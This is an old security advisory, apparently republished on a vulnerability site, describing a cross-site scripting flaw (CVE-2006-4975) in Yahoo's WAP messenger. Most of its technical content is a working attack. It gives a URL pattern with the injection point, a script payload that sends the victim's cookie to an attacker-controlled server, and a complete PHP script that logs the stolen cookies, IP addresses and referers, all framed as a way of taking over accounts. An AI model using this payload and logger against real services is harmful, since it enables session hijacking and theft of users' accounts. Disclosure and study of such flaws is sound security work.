WAPY! Messenger Cross-Site Scripting Vulnerability

2006.09.26
Credit: Dedi Dwianto
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-4975
CWE: CWE-Other


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

ECHO_ADV_47$2006 ------------------------------------------------------------------------ ------ [ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability ------------------------------------------------------------------------ ------ Author : Dedi Dwianto Date Found : Sep, 14th 2006 Location : Indonesia, Jakarta web : http://advisories.echo.or.id/adv/adv47-theday-2006.txt Critical Lvl : Medium Critical Impact : Cross Site Scripting Where : From Remote ------------------------------------------------------------------------ --- Affected Yahoo Service description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wireless Application Protocol or WAP is an open international standard for applications thatuse wireless communication. Its principal application is to enable access to the internet from a mobile phone or PDA. Yahoo! Have wap site which provide mobile services such as messenger,mail and news via mobile phone or PDA. Service : Y! Messenger URL : http://mm.yahoo.com/ ------------------------------------------------------------------------ --- Vulnerability: ~~~~~~~~~~~~~~ Y! Wap messenger allow user can execute the HTML code if message want to save. Proof Of Concept: ~~~~~~~~~~~~~~~ [1] Open and login with wap browser , url : http://mm.yahoo.com [2] Goto : http://mm.yahoo.com/xhtml?k=[id]&u=[your_nick]&s=[your session]&m=[your_nick]_dummymin&c=707&p=&d=[your_friend_id]*[your_nick]* [random number]*[XSS HERE] Attacker Stealting Cookie for get Account : [1] Send message to victim with connected via mobile/wap . message : ----begin---- Hello , please save my message :) <script>document.location='http://your-server/get_cookie.php?ambil=' + document.cookie</script> ----end ----- ----get_cookie.php---- <?php $cookie = $_GET['ambil']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a"); $referer=getenv ('HTTP_REFERER'); $fp = fopen('cookies.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br><br>'); fclose($fp); ?> ----end ----- change permission file cookies.txt to 777 Solution: ~~~~~~~ - Don't Save any message with html code :). ------------------------------------------------------------------------ --- Shoutz: ~~~ ~ y3dips,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ az001,boom3x,mathdule,angelia ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #aikmel - #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~ EcHo Research & Development Center the_day[at]echo[dot]or[dot]id -------------------------------- [ EOF ]----------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top